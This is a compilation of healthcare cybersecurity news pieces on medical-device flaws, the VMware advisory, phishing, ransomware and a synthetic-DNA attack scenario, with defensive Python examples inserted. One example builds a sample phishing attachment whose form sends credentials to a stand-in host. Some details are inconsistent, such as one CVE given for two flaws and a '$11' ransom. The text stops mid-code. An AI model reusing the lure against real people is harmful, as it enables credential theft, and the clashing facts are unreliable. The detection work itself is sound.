Healthcare Cybersecurity

Serious Vulnerabilities Identified in Medtronic MyCareLink Smart Patient Readers

Three serious vulnerabilities have been identified in Medtronic MyCareLink (MCL) Smart Patient Readers, which could potentially be exploited to gain access to and modify patient data from the paired implanted cardiac device. Exploitation of the vulnerabilities together could permit remote code execution on the MCL Smart Patient Reader, allowing an attacker to take control of a paired cardiac device. In order to exploit the vulnerabilities, an attacker would need to be within Bluetooth signal proximity to the vulnerable product.

The flaws are present in all versions of the MCL Smart Model 25000 Patient Reader. The first vulnerability, tracked as CVE-2020-25183, is an authentication protocol vulnerability. The method used to authenticate the MCL Smart Patient Reader and the Medtronic MyCareLink Smart mobile app can be bypassed. An attacker using another mobile device or malicious app on the patient’s smartphone could authenticate to the patient’s MCL Smart Patient Reader, tricking it into believing it is communicating with the patient’s smartphone app. The vulnerability has been assigned a CVSS v3 base score of 8.0 out of 10.

A heap-based buffer overflow event can be triggered in the MCL Smart Patient Reader software stack by an authenticated attacker running a debug command. Once triggered, an attacker could then remotely execute code on the vulnerable MCL Smart Patient Reader, potentially allowing the attacker to take control of the device. The vulnerability is tracked as CVE-2020-27252 and has been assigned a CVSS v3 base score of 8.8 out of 10.

MCL Smart Patient Readers are also vulnerable to a race condition in the software update system, which could be exploited to upload and execute unsigned firmware on the Patient Reader. This vulnerability could also allow remote execution of arbitrary code on the MCL Smart Patient Reader and could give an attacker control of the device. The flaw is tracked as CVE-2020-27252 and has been assigned a CVSS v3 base score of 8.8 out of 10.

The vulnerabilities were identified by researchers at the Israeli firm Sternum, with UC Santa Barbara, University of Florida, and University of Michigan researchers independently identifying the improper authentication vulnerability.

The flaws were reported to Medtronic, which has now released a firmware update to fix the vulnerabilities. The firmware update is delivered by updating the MyCareLink Smart app via the associated mobile application store. Updating to mobile application version v5.2 will ensure the update is applied on the next use; however, in order for the patch to work, the user’s smartphone must be running iOS 10 or above or Android 6.0 or above.

Users have also been advised to maintain strong physical control over their home monitors and to restrict use of the home monitors to private environments. Patients should only use home monitors that have been obtained directly from their healthcare provider or a Medtronic representative.

Medtronic has also taken steps to improve security, including implementing Sternum’s enhanced integrity validation (EIV) technology which provides early detection and real-time mitigation of known vulnerability exploitation attempts, and Sternum’s advanced detection system technology, which enables device-level logging and monitoring of all device activity and behavior.

The post Serious Vulnerabilities Identified in Medtronic MyCareLink Smart Patient Readers appeared first on HIPAA Journal.

Russian State-Sponsored Hackers Exploiting Vulnerability in VMWare Virtual Workspaces

The U.S. National Security Agency (NSA) has issued a cybersecurity advisory warning that Russian state-sponsored hacking groups are targeting a vulnerability in VMWare virtual workspaces used to support remote working.

The flaw, tracked as CVE-2020-4006, is present in certain versions of VMware Workspace One Access, Access Connector, Identity Manager, and Identity Manager Connector products and is being exploited to gain access to enterprise networks and protected data on the affected systems.

The flaw is a command-injection vulnerability in the administrative configurator component of the affected products. The vulnerability can be exploited remotely by an attacker with valid credentials and access to the administrative configurator on port 8443. If successfully exploited, an attacker would be able to execute commands with unrestricted privileges on the operating system and access sensitive data.

VMWare released a patch to correct the vulnerability on December 3, 2020 and also published information to help network defenders identify networks that have already been compromised, along with steps to eradicate threat actors who have already exploited the flaw.

The flaw may not have been given priority by system administrators as it was only rated by VMWare as ‘important’ severity, with a CVSS v3 base score of 7.2 out of 10 assigned to the flaw. The relatively low severity rating is because a valid password must be supplied to exploit the flaw and the account is internal to the impacted products. However, as the NSA explained, the Russian threat actors are already exploiting the flaw using stolen credentials.

In attacks observed by the NSA, the hackers exploited the command injection flaw to install a web shell, then generated SAML authentication assertions and sent them to Microsoft Active Directory Federation Services (ADFS), granting access to protected data.

The best way of preventing exploitation is to apply the VMWare patch as soon as possible. If it is not possible to apply the patch, it is important to ensure that strong, unique passwords are set to protect against brute force attempts to crack passwords. The NSA also recommends administrators ensure the web-based management interface is not accessible over the Internet.

Strong passwords will not prevent the flaw from being exploited and will not provide protection if the flaw has already been exploited. “It is critical when running products that perform authentication that the server and all the services that depend on it are properly configured for secure operation and integration,” explained the NSA. “Otherwise, SAML assertions could be forged, granting access to numerous resources.” If integrating authentication servers with ADFS, the NSA recommends following Microsoft’s best practices, especially for securing SAML assertions. Multi-factor authentication should also be implemented.

The NSA has published a workaround that can be used to prevent exploitation until the patch can be applied and recommends reviewing and hardening configurations and monitoring federated authentication providers.

Unfortunately, detecting exploitation of the vulnerability can be difficult. “Network-based indicators are unlikely to be effective at detecting exploitation since the activity occurs exclusively inside an encrypted transport layer security (TLS) tunnel associated with the web interface,” explained the NSA in the advisory. The intrusion can, however, be identified from server logs that can be found at /opt/vmware/horizon/workspace/logs/configurator.log. The presence of an exit statement followed by a three-digit number within the configurator.log suggests the flaw may already have been exploited.
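The host-based check described above can be scripted. The following is an added example, not code from the NSA advisory or from VMware: it scans configurator.log lines for an "exit" statement followed by a three-digit number. The log lines and their format are constructed for illustration; only the log path is taken from the text, and the regular expression is an assumption about how the indicator appears in the log.

```python
import re

# Log location named in the advisory; the line format used below is an assumption.
CONFIGURATOR_LOG = "/opt/vmware/horizon/workspace/logs/configurator.log"

# Indicator: the word "exit" followed by whitespace and exactly three digits.
# "exit 0" (one digit) and "exited" (no separator) deliberately do not match.
EXIT_RE = re.compile(r"\bexit\s+(\d{3})\b", re.IGNORECASE)

# Constructed sample lines, not real VMware output.
SAMPLE_LINES = [
    "2020-12-04 09:12:01,114 INFO  [ConfiguratorServlet] settings saved by admin",
    "2020-12-04 09:13:44,903 INFO  [ConfiguratorServlet] command finished: exit 127",
    "2020-12-04 09:14:02,000 INFO  [Scheduler] maintenance task exited cleanly",
    "2020-12-04 09:15:09,552 WARN  [Scheduler] exit 0 recorded for routine task",
]


def find_exit_indicators(lines):
    """Return (line_number, exit_code, line) for every line carrying the indicator."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = EXIT_RE.search(line)
        if match:
            hits.append((number, match.group(1), line.rstrip("\n")))
    return hits


def scan_log(path=CONFIGURATOR_LOG):
    """Run the indicator search over a log file on disk (read-only)."""
    with open(path, encoding="utf-8", errors="replace") as handle:
        return find_exit_indicators(handle)


if __name__ == "__main__":
    for number, code, line in find_exit_indicators(SAMPLE_LINES):
        print(f"line {number}: exit code {code}: {line}")
```

A hit is a reason to follow the VMSA-2020-0027 and NSA eradication guidance, not proof of compromise on its own; because the exploitation traffic is inside TLS, this log review is the practical detection point and should be repeated on every affected appliance.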

VMWare recommends all customers refer to VMSA-2020-0027 for information on this vulnerability.


Critical Vulnerabilities Identified in More Than 100 GE Healthcare Imaging and Ultrasound Products

Two critical severity vulnerabilities have been identified in GE Healthcare medical imaging devices that allow remote code execution and access/alteration of sensitive patient data. The vulnerabilities affect GE Healthcare’s proprietary management software and impact more than 100 GE Healthcare imaging devices including MRI, Ultrasound, Advanced Visualization, Interventional, X-Ray, Mammography, Computed Tomography, Nuclear Medicine and PET/CT devices.

Affected GE Healthcare Products (device type: product families)

MRI: Brivo, Optima, Signa
Ultrasound: EchoPAC, Image Vault, LOGIQ, Vivid, Voluson
Advanced Visualization: AW
Interventional: Innova, Optima
X-Ray: AMX, Brivo, Definium, Discovery, Optima, Precision
Mammography: Seno, Senographe Pristina
Computed Tomography: BrightSpeed, Brivo, Discovery, Frontier LightSpeed, Optima, Revolution
Nuclear Medicine, PET/CT: Brivo, Discovery, Infinia Optima, PET Discovery, PETtrace, Ventri, Xeleris

The vulnerabilities were identified by Lior Bar Yosef and Elad Luz of CyberMDX who reported them to GE Healthcare in May 2020. CyberMDX has dubbed the flaws MDHexRay, with both being assigned a CVSS v3 base score of 9.8 out of 10.

The first flaw is due to unprotected transport of credentials across the network and is tracked as CVE-2020-25175. The second flaw is due to the exposure of sensitive system information to an unauthorized control sphere, which could allow exposed/default credentials to be used to access or modify sensitive information.

The CyberMDX researchers found GE Healthcare’s maintenance protocols relied on having certain ports open and accessible to GE Healthcare to allow the devices to be remotely managed over the internet. While it is necessary for credentials to be used for the update and maintenance software, GE Healthcare would only change the default credentials at the request of a customer and the default credentials used by GE Healthcare could be easily found online. It is unclear how many customers requested the default credentials be changed.

Exploiting the vulnerabilities would require an attacker to already be connected to the hospital network. The default credentials could then be used to access vulnerable connected imaging devices and any data stored on the devices. The medical devices could not be accessed over the Internet by unauthorized users who do not have access to a hospital’s internal network. There are no reported cases of the vulnerabilities being exploited in the wild.

GE Healthcare has assessed the vulnerabilities and conducted a risk assessment and determined there are no patient safety concerns; however, the flaws do pose a risk to patient privacy. It would also be possible for an attacker to modify patient data, which could potentially influence the results of certain therapies. Since data only remains on the imaging machines for a limited amount of time before being transferred to PACS, the patient information that could be obtained or modified would be limited.

According to the DHS Cybersecurity and Infrastructure Security Agency (CISA), “If exploited, these vulnerabilities could allow an attacker to gain access to affected devices in a way that is comparable with GE (remote) service user privileges. A successful exploitation could expose sensitive data such as a limited set of patient health information (PHI) or could allow the attacker to run arbitrary code, which might impact the availability of the system and allow manipulation of PHI.”

While there is no patch available to correct the vulnerabilities, it is possible to mitigate the issue by changing the default password; however, that cannot be performed by end users, only by GE Healthcare. GE Healthcare is now notifying its customers and is helping affected customers change the default password and ensure that their product firewalls are set up properly. Customers are also being advised to follow best practices for network management and security. CyberMDX recommends restricting ports 21 (FTP), 22 (SSH), 23 (Telnet), and 512 (REXEC) to listening state.


COVID-19 Vaccine Cold Chain Organizations Targeted in Global Phishing Campaign

The Cybersecurity and Infrastructure Security Agency (CISA) has issued a warning about a global spear phishing campaign targeting organizations in the cold storage and supply chain that are involved with the distribution of COVID-19 vaccines.

Two of the first vaccines to be produced must be kept at low temperatures during storage and transit prior to being administered. The Pfizer/BioNTech vaccine must be kept at -94°F (-70°C) and the Moderna vaccine at -4°F (-20°C), so cold chain organizations are a key element of the supply chain.

At the start of the pandemic, IBM X-Force established a cyber threat task force to track threats targeting organizations involved in the fight against COVID-19. The task force recently published a report about an ongoing spear phishing campaign that started in September 2020 which is targeting organizations supporting the Cold Chain Equipment Optimization Platform program. The program was launched in 2015 by the United Nations Children’s Fund and partner organizations to distribute vaccines worldwide.

Phishing emails have been sent to executives in sales, procurement, information technology, and finance who are likely to be involved in efforts to support the vaccine cold chain. Targeted organizations are believed to be providers of material support to meet the transportation needs within the COVID-19 cold chain.

The phishing emails appear to have been sent by an executive at Haier Biomedical, a Chinese qualified supplier of the Cold Chain Equipment Optimization Platform program. Haier Biomedical is the only complete cold chain provider in the world, so it is an ideal target for impersonation in the campaign.

The emails intercepted by IBM X-Force researchers had malicious HTML attachments that open locally and prompt the recipients to enter their credentials in order to open the file. The captured credentials can then be used to intercept internal communications about the process, methods, and plans to distribute COVID-19 vaccines. Once credentials are obtained, the attackers can move laterally through networks, conduct cyber espionage, and steal additional information for use in further attacks.
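The attachment pattern described above (an HTML file that opens locally and presents a login form) is detectable before the message reaches a user. The following is an added example, not code from IBM X-Force or from the article: it parses a message, finds HTML attachments, and flags those that contain a password field whose form posts to an external host. The sample message, its addresses, and the collector hostname are constructed for the example.

```python
import email
from email import policy
from email.message import EmailMessage
from html.parser import HTMLParser
from urllib.parse import urlparse


class _FormProbe(HTMLParser):
    """Collect the features of a credential-harvesting page: password inputs, form targets, scripts."""

    def __init__(self):
        super().__init__()
        self.password_inputs = 0
        self.form_actions = []
        self.script_tags = 0

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "input" and a.get("type", "").lower() == "password":
            self.password_inputs += 1
        elif tag == "form":
            self.form_actions.append(a.get("action", ""))
        elif tag == "script":
            self.script_tags += 1


def analyze_html(html_text):
    """Summarise one HTML document; external_hosts lists where any form would submit."""
    probe = _FormProbe()
    probe.feed(html_text)
    hosts = sorted({urlparse(u).hostname for u in probe.form_actions
                    if urlparse(u).scheme in ("http", "https") and urlparse(u).hostname})
    return {"password_inputs": probe.password_inputs,
            "form_actions": probe.form_actions,
            "external_hosts": hosts,
            "script_tags": probe.script_tags}


def scan_message(raw_bytes):
    """Return one finding per HTML attachment. The verdict is 'credential_harvest' when a
    password field would be submitted to an external host, the pattern the article describes;
    anything else is left for analyst review rather than auto-cleared."""
    msg = email.message_from_bytes(raw_bytes, policy=policy.default)
    findings = []
    for part in msg.walk():
        if part.get_content_disposition() != "attachment":
            continue
        name = (part.get_filename() or "").lower()
        if part.get_content_type() != "text/html" and not name.endswith((".html", ".htm")):
            continue
        html_text = part.get_payload(decode=True).decode("utf-8", errors="replace")
        finding = analyze_html(html_text)
        finding["filename"] = name
        finding["verdict"] = ("credential_harvest"
                              if finding["password_inputs"] and finding["external_hosts"]
                              else "review")
        findings.append(finding)
    return findings


def build_sample_eml():
    """Constructed message imitating the lure: a quotation with an HTML login form attached."""
    msg = EmailMessage()
    msg["From"] = "sales@supplier.example"          # constructed sender
    msg["To"] = "procurement@coldchain.example"     # constructed recipient
    msg["Subject"] = "Quotation for -70C freezers"
    msg.set_content("Please review the attached quotation.")
    lure = ("<html><body><h1>Secure document</h1>"
            "<form method='post' action='https://collector.example/login'>"   # constructed host
            "<input name='user'><input type='password' name='pass'></form>"
            "</body></html>")
    msg.add_attachment(lure, subtype="html", filename="quotation.html")
    return msg.as_bytes()
```

Because the form lives inside the attachment rather than behind a link, URL reputation checks on the message body never see the collector host; inspecting attachment content is what surfaces it. Obfuscated scripts that build the form at runtime would defeat this static probe, so a non-zero script count in an HTML attachment is itself worth routing to review.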

IBM reports that the phishing campaign spans 6 countries and, so far, 10 global organizations are known to have been targeted, as well as the European Commission’s Directorate-General for Taxation and Customs Union. Targeted organizations span several industry sectors including energy, manufacturing, software, and information technology. The researchers were unable to confirm the extent to which the campaign has been successful.

Based on the precision targeting of executives in specific global organizations involved in vaccine storage and transport and the lack of a clear path to cash out, the campaign is likely being conducted by a nation state threat actor. IBM X-Force suggests that cybercriminal organizations would be unlikely to invest the time, money, and resources into such a campaign targeting so many global organizations.

IBM X-Force recommends organizations involved in the cold storage and transport chain should take steps to mitigate the risks from phishing including creating and testing incident response plans, sharing and ingesting threat intelligence, assessing their third-party ecosystems, applying a zero-trust approach to security, using multi-factor authentication across the organization, using endpoint protection and response tools, and conducting regular email security awareness training.

In addition to the threat from phishing, organizations involved in the cold storage chain should take steps to protect against ransomware attacks as they will be a likely target over the coming weeks and months. In November, the U.S. based cold storage company Americold Realty Trust was the victim of a cyberattack suspected to have involved the use of ransomware. The company was reportedly negotiating with Chicago Rockford International Airport to assist with the distribution of COVID-19 vaccines.


Vulnerabilities in OpenClinic Application Could Allow Unauthorized PHI Access

Four vulnerabilities have been identified in the OpenClinic application, the most severe of which could allow authentication to be bypassed and protected health information (PHI) to be viewed from the application by unauthorized users.

OpenClinic is open source, PHP-based health record management software that is used in many private clinics, hospitals, and physician practices for administration, clinical and financial tasks.

A BishopFox Labs researcher has identified four vulnerabilities in the software which have yet to be corrected. The most serious vulnerability involves missing authentication, which could be exploited to gain access to any patient’s medical test results. Authenticated users of the platform can upload patient’s test results to the application, which are loaded into the /tests/ directory. Requests for files in that directory do not require users to be authenticated to the application to return and display the test results.

In order for the test results to be obtained, an unauthenticated user would need to guess the names of the files; however, the BishopFox researcher explained that medical test filenames can be predictable and could be obtained through log files on the server or other network infrastructure. The vulnerability (CVE-2020-28937) can be exploited remotely and has received a high severity rating.

A high severity insecure file upload vulnerability (CVE-2020-28939) was identified which would allow users with administrative or administrator user roles to upload malicious files. The researcher found those users who have rights to enter medical tests for patients could upload files using the /openclinic/medical/test_new.php endpoint, which does not restrict the types of files that can be uploaded to the application. Consequently, it would be possible to upload web shells, which could be used for arbitrary code execution on the application server. A malicious actor with an administrative or administrator user role could obtain sensitive information, escalate privileges, install malicious software, or gain access to the internal network.

The third vulnerability (CVE-2020-28938) is a medium-severity stored cross-site scripting vulnerability that allows application users to force actions on behalf of other users. Measures have been included in the application to prevent cross-site scripting; however, those controls can be bypassed. A low-privileged user could exploit the vulnerability by getting an Administrator to click a malicious link, which could be used to execute a payload that creates a new Administrator account for the low privileged user.

The fourth vulnerability is a low-severity path traversal flaw that could be exploited in a denial of service attack affecting upload functionality. The flaw allows an authenticated attacker to write files to the application server’s filesystem.
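The first, second and fourth findings above are all failures in the same upload-and-serve path: files served without authentication, uploads with no type restriction, and a path traversal on write. The following is an added example, not OpenClinic's code (OpenClinic is PHP; this is a language-neutral illustration of the controls), showing one handler that gates reads on a session, restricts uploads by extension and content signature, stores them under random non-guessable names, and refuses paths that escape the upload directory. The role names, session layout and temporary upload directory are assumptions, not OpenClinic's actual configuration.

```python
import secrets
import tempfile
from pathlib import Path

# Stands in for the application's /tests/ directory (assumption: a fresh temp dir).
UPLOAD_ROOT = Path(tempfile.mkdtemp(prefix="tests_")).resolve()

# Allowed extensions with the leading bytes a genuine file of that type carries.
ALLOWED_TYPES = {
    ".pdf": b"%PDF-",
    ".png": b"\x89PNG\r\n\x1a\n",
    ".jpg": b"\xff\xd8\xff",
}

# Role names are assumed for the example, not OpenClinic's own.
UPLOAD_ROLES = {"doctor", "administrative", "administrator"}


class Forbidden(Exception):
    """Caller is not authenticated or not authorised."""


class BadRequest(Exception):
    """Input rejected: wrong type, mismatched content, or unsafe path."""


def store_test_result(session, original_name, data):
    """Accept a medical test file only from an authenticated clinical role, only if its
    extension is allowed AND its content matches that type, and store it under a random name."""
    if not session.get("user") or session.get("role") not in UPLOAD_ROLES:
        raise Forbidden("upload requires an authenticated clinical user")
    ext = Path(original_name).suffix.lower()
    signature = ALLOWED_TYPES.get(ext)
    if signature is None:
        raise BadRequest(f"file type {ext!r} is not allowed")   # blocks .php and friends
    if not data.startswith(signature):
        raise BadRequest("content does not match the declared file type")
    # Random name: the original filename never reaches the filesystem, so neither a
    # traversal sequence in it nor a guessable pattern can be used by a caller.
    stored_name = f"{secrets.token_urlsafe(24)}{ext}"
    (UPLOAD_ROOT / stored_name).write_bytes(data)
    return stored_name


def serve_test_result(session, requested_name):
    """Return file bytes only to an authenticated user and only from inside UPLOAD_ROOT."""
    if not session.get("user"):
        raise Forbidden("login required")
    target = (UPLOAD_ROOT / requested_name).resolve()
    if UPLOAD_ROOT not in target.parents:
        raise BadRequest("path escapes the upload directory")
    if not target.is_file():
        raise BadRequest("no such file")
    return target.read_bytes()


def outcome(fn, *args):
    """Run a handler and report 'ok' or the name of the rejection raised (for demonstration)."""
    try:
        fn(*args)
        return "ok"
    except (Forbidden, BadRequest) as exc:
        return type(exc).__name__
```

In a real deployment the read path would additionally check that the requesting user is entitled to that specific patient's record; authentication alone, which is what the missing control here was, is the minimum, not the whole answer. The content-signature check matters because an extension allowlist on its own still admits a script renamed to .pdf.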

Gerben Kleijn, Senior Security Consultant, Bishop Fox, was credited with discovering the flaws. “At the time of this publication there is no version of OpenClinic available that does not suffer from the identified vulnerabilities, and the recommendation is to switch to a different medical records management software,” said Kleijn in a blog post announcing the vulnerabilities.

These are not the first serious vulnerabilities to be identified in OpenClinic this year. In July, an alert was issued by CISA about 12 vulnerabilities in the software, 3 of which were rated critical and 2 high severity.


Researchers Describe Possible Synthetic DNA Supply Chain Attack

A team of researchers at Ben-Gurion University in Israel have described a possible bioterrorist attack scenario in which the supply chain of synthetic DNA could be compromised. DNA synthesis providers could be tricked into producing harmful DNA sequences, bypassing current security controls, and delivering those sequences to healthcare customers.

Synthetic DNA is currently produced for research purposes and is available in many ready-to-use forms. Clients of DNA synthesis providers specify the DNA sequences they require and the DNA synthesis company generates the requested sequences to order and ships them to their customers.

There are safety controls in place to prevent DNA being synthesized that could be harmful, but the Ben-Gurion University researchers point out that those safety checks are insufficient. Hackers could potentially exploit security weaknesses and inject rogue genetic information into the synthesis process, unbeknown to the customers or DNA synthesis providers. For example, rogue genetic material could be inserted that encodes for a harmful protein or a toxin.

The researchers describe an attack scenario where a bioterrorist could conduct an attack that sees harmful biological material ordered, produced, and delivered to customers, without the attacker ever having to come into contact with lab components or biological materials. The researchers say the hypothetical attack method they describe is an “end-to-end cyberbiological attack” that can be performed remotely using a computer with a carefully crafted spear phishing email that delivers a malicious browser plug-in.

An attacker could craft a spear phishing email targeting an individual and use social engineering techniques to get them to install a malicious browser plug-in on their computer. When a genuine order is placed for a specific DNA sequence, the attacker would perform a man-in-the-middle attack and change the requested DNA sequence sent to the DNA synthesis provider, without the knowledge of the person submitting the order.

Checks would be performed by the DNA synthesis company to screen out potentially dangerous sequences. Provided those checks are passed, DNA synthesis would begin, and the product would then be shipped to the customer. The sequence would be checked by the customer, but the same malicious plugin could return the requested sequence. The DNA sequence with the rogue DNA would then be used in the belief it is the sequence requested.

Source: Ben-Gurion University

The research paper describing the threat and the potential attack method – Cyberbiosecurity: Remote DNA Injection Threat in Synthetic Biology – was recently published in Nature Biotechnology. The image above shows the attack process with the malicious steps detailed in red.

The Department of Health and Human Services has produced HHS Screening Framework Guidance for Providers of Synthetic Double-Stranded DNA and requires DNA synthesis providers to screen double stranded DNA. The screening process should highlight any harmful sequences and would ensure that those sequences were not released to customers; however, the researchers point out that there is currently no single, comprehensive database of all pathogenic sequences and it is potentially possible to bypass these checks.

“Currently, the software stack used to develop synthetic genes is loosely secured, allowing the injection of rogue genetic information into biological systems by a cybercriminal with an electronic foothold within an organization’s premises,” explained the researchers. The researchers also demonstrated that through the use of obfuscation, 16 out of 50 DNA samples were not detected by screening systems.

A bioterrorist attack of this nature would be complex, which limits the potential for such an attack to occur, but given the potentially devastating consequences, more rigorous security controls need to be implemented. The current safety mechanisms have been put in place to prevent the deliberate or accidental synthesis of harmful DNA, but the researchers explain that those safety mechanisms have not been adapted to reflect recent developments in synthetic biology and cyberwarfare.

“Biosecurity researchers agree that an improved DNA screening methodology is required to prevent bioterrorists and careless enthusiasts from generating dangerous substances in their labs,” explained the researchers in the report.


FBI Issues Warning About Increasing Ragnar Locker Ransomware Activity

Threat actors using Ragnar Locker ransomware have stepped up their attacks and have been targeting businesses and organizations in many sectors, according to a recent private industry alert from the Federal Bureau of Investigation (FBI).

Ragnar Locker ransomware was first identified by security researchers in April 2019, with the first known attack targeting a large corporation that was issued with an $11 ransom demand for the keys to decrypt files and ensure the secure deletion of the 10 terabytes of sensitive data stolen in the attack.

While not named in the FBI alert, the attack appears to have been on the multinational energy company, Energias de Portugal. The gang was also behind the ransomware attacks on the Italian drinks giant Campari and the Japanese gaming firm Capcom.

Since that attack, the number of Ragnar Locker victims has been steadily growing. Attacks have been successfully conducted on cloud service providers, and companies in communication, construction, travel, enterprise software, and other industries.

As with other human-operated ransomware attacks, the threat actors behind Ragnar Locker ransomware conduct targeted attacks to gain a foothold in victims’ networks, then have a reconnaissance phase where they identify network resources, sensitive data, and backup files. Sensitive data is exfiltrated, then the final stage of the attack involves the deployment of ransomware on all connected devices.

The Ragnar Locker gang uses a variety of obfuscation techniques to evade security solutions, with those techniques changing frequently. Ragnar Locker ransomware attacks are easily distinguished, as the encrypted files are given a unique extension – .RGNR_<ID>, with the ID created using a hash of the computer’s NETBIOS name. The attackers also identify themselves in the ransom note dropped on victim devices.

The initial attack vector is commonly Remote Desktop Protocol (RDP) using stolen credentials or brute force attempts to guess weak passwords. The gang uses VMProtect, UPX, and custom packing algorithms and encrypts files from Windows XP virtual machines that have been deployed on victims’ networks. The attackers terminate security processes, including programs commonly used by managed service providers to monitor their clients’ networks, and encrypt files on all connected drives. Volume Shadow Copies are deleted to make it harder for victims to recover files without paying the ransom.

Many ransomware variants search for files of interest and encrypt files with specific extensions; however, Ragnar Locker will encrypt all files in folders that have not been previously marked to be skipped. The untouched folders include Windows, ProgramData, and web browser directories.
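The extension pattern and the skipped-folder behaviour described in the two paragraphs above can be turned into a quick triage check for a file listing. The following is an added example, not code from the FBI alert: it extracts the .RGNR_<ID> marker from paths, counts distinct IDs (one ID per host, since the ID derives from the NETBIOS name, so several IDs on one share means several infected hosts wrote to it), and flags any encrypted file inside a folder the text says the ransomware normally leaves alone. The sample paths are constructed, and treating the ID as hexadecimal is an assumption.

```python
import re
from collections import Counter

# Assumption: the ID portion is hexadecimal. Widen the character class if your samples differ.
RGNR_RE = re.compile(r"\.RGNR_([0-9A-Fa-f]+)$")

# Folders the text says are left untouched; an encrypted file here is an anomaly worth a look.
SKIPPED_DIRS = ("\\windows\\", "\\programdata\\")

# Constructed paths, not from a real incident.
SAMPLE_PATHS = [
    r"C:\Users\alice\Documents\budget.xlsx.RGNR_A1B2C3D4",
    r"C:\Users\alice\Documents\notes.txt",
    r"D:\Shares\finance\q3.pdf.RGNR_A1B2C3D4",
    r"\\fileserver\hr\contracts.docx.RGNR_FFEE0011",
    r"C:\Windows\System32\drivers\etc\hosts",
]


def find_encrypted(paths):
    """Return (path, id) for every path carrying the Ragnar Locker extension."""
    hits = []
    for path in paths:
        match = RGNR_RE.search(path)
        if match:
            hits.append((path, match.group(1).upper()))
    return hits


def triage(paths):
    """Summarise a listing: how many files are encrypted, which IDs appear, and any
    encrypted files sitting in folders the ransomware is documented to skip."""
    encrypted = find_encrypted(paths)
    ids = Counter(file_id for _, file_id in encrypted)
    return {
        "encrypted_count": len(encrypted),
        "ids": dict(ids),
        "distinct_hosts": len(ids),
        "in_skipped_dirs": [p for p, _ in encrypted
                            if any(s in p.lower() for s in SKIPPED_DIRS)],
    }


if __name__ == "__main__":
    print(triage(SAMPLE_PATHS))
```

The distinct-ID count is the useful part during scoping: a share that shows two IDs was written to by two compromised endpoints, which changes the containment list even before the hosts themselves have been examined.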

The attackers steal data and use the threat of publication to apply pressure on companies to pay the ransom. It may be possible to restore encrypted files from backups, but the threat of the release of sensitive data may be sufficient to ensure the ransom is paid. The gang recently took out Facebook ads using a compromised account to pressure Campari into paying the ransom.

To prevent Ragnar Locker ransomware attacks it is necessary to block the initial attack vector. RDP should be disabled if possible, strong passwords should be set, multi-factor authentication implemented, and all computers and systems should be kept up to date with patches applied promptly. Antivirus software should be installed and set to update automatically, and remote connections should only be possible through a VPN, and never via unsecured, public Wi-Fi networks.

To ensure that files can be recovered in the event of a successful attack, backups should be regularly performed, and copies of backups stored on a non-networked device. The FBI also points out that it should not be possible to modify or delete backups from the system where the data resides.


Free Google Services Abused in Phishing Campaigns

Several phishing campaigns have been identified that are using free Google services to bypass email security gateways and ensure malicious messages are delivered to inboxes.

Phishing emails often include hyperlinks that direct users to websites hosting phishing forms that harvest credentials. Email security gateways use a variety of methods to detect these malicious hyperlinks, including blacklists of known malicious websites, scoring of domains, and visiting the links to analyze the content on the destination website. If the links are determined to be suspicious or malicious, the emails are quarantined or rejected. However, by using links to legitimate Google services, phishers are managing to bypass these security measures and ensure their messages are delivered.

The use of Google services by phishers is nothing new; however, security researchers at Armorblox have identified an uptick in this activity that has coincided with increased adoption of remote working. The researchers identified 5 campaigns abusing free Google services such as Google Forms, Google Drive, Google Sites, and Google Docs. It is not just Google services that are being abused, as campaigns have been detected that abuse other free cloud services such as Microsoft OneDrive, Dropbox, Webflow, SendGrid, and Amazon Simple Email Service.

One of the campaigns impersonated American Express, with the initial message requesting account validation as the user was found to have missed information when validating their card. The emails direct the user to a phishing page created using Google Forms. The form includes the official American Express logo and a short questionnaire requesting information that can be used by the attackers to gain access to their credit card account – login information, phone number, card number and security code, and security questions and answers.

Since the link in the email directs the user to Google Forms – a legitimate Google domain and service – it is unlikely that an email security gateway would identify the URL as malicious. “Google’s domain is inherently trustworthy and Google forms are used for several legitimate reasons, no email security filter would realistically block this link on day zero,” explained the Armorblox researchers.

Another campaign used Google Forms in a classic phishing lure. The emails appear to have been sent by a childless widow who has been diagnosed with terminal cancer. She is looking to donate her fortune to good causes, with the recipient of the message told that the widow would like them to make donations to good causes on her behalf. The hyperlink directs the user to an untitled Google Form. Should anyone proceed and submit an answer to the untitled question, they will be shortlisted for further extortion attempts.

A campaign was detected that used a fake email login page hosted on Google’s Firebase mobile platform, which is used to create apps, files, and images. The emails in this campaign impersonate the security team and claim important emails have not been delivered due to the email storage quota being exceeded. The campaign targets email login credentials. The link to Firebase would be unlikely to be identified as malicious since it is a legitimate cloud storage repository.

Google Docs has also been abused in a campaign in which the payroll team is impersonated, with the Google Docs document containing a link to a phishing page where sensitive information is harvested. Since the initial link is to a legitimate and commonly used Google service, it is unlikely to be blocked by email security solutions. While some email solutions would be able to identify the malicious link in the Google-hosted document, various redirects are used to obfuscate the malicious link.

A campaign was also identified that impersonated the user's IT department security team and Microsoft Teams, using a fake Microsoft login page hosted on Google Sites. Google Sites is a legitimate service that allows individuals to easily create webpages, but in this case it has been used to create a webpage hosting a phishing form, complete with the genuine Microsoft logo.

Campaigns abusing trust in Google Docs have also been identified by researchers at Area 1 Security. The messages in that campaign impersonated the HR department and claimed the recipient had been terminated, with the Google Docs document providing details of the termination and severance pay. The document contains a malicious macro that, if allowed to run, will download the Bazar Backdoor and Buer loader malware. IRONSCALES also recently reported that around half of all sophisticated phishing campaigns were successfully bypassing the leading email security gateways.
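The common thread in the campaigns above is that the landing page sits on a Google domain a gateway cannot simply block, so a defender has to look at the combination of signals instead of the host alone. The following is an added example, not code from the article, Armorblox, Area 1 or IRONSCALES: a small heuristic that extracts links from an email, recognises user-publishable Google services by their public URL shapes (docs.google.com/forms, forms.gle, docs.google.com/document, sites.google.com, *.web.app and *.firebaseapp.com for Firebase Hosting), and flags the message only when such a link is paired with credential, payment or HR lure wording. The sample emails, sender addresses, document identifiers and the lure keyword list are constructed for this example.

```python
"""Heuristic triage of emails whose lure pages are hosted on free Google services.

Added example, not the article's or any vendor's code. A link to Google Forms,
Docs, Sites or Firebase is not malicious by itself; the signal is that link
combined with lure wording from a sender that has no reason to use a
user-publishable Google service for the stated purpose.
"""
import re
from urllib.parse import urlparse

URL_RE = re.compile(r"https?://[^\s<>\"']+")

# (label, host pattern, path pattern) for Google services anyone can publish to.
# Host/path shapes are the services' public URL forms; the labels are our own.
FREE_HOSTING = [
    ("google-forms", re.compile(r"^docs\.google\.com$", re.I), re.compile(r"^/forms/")),
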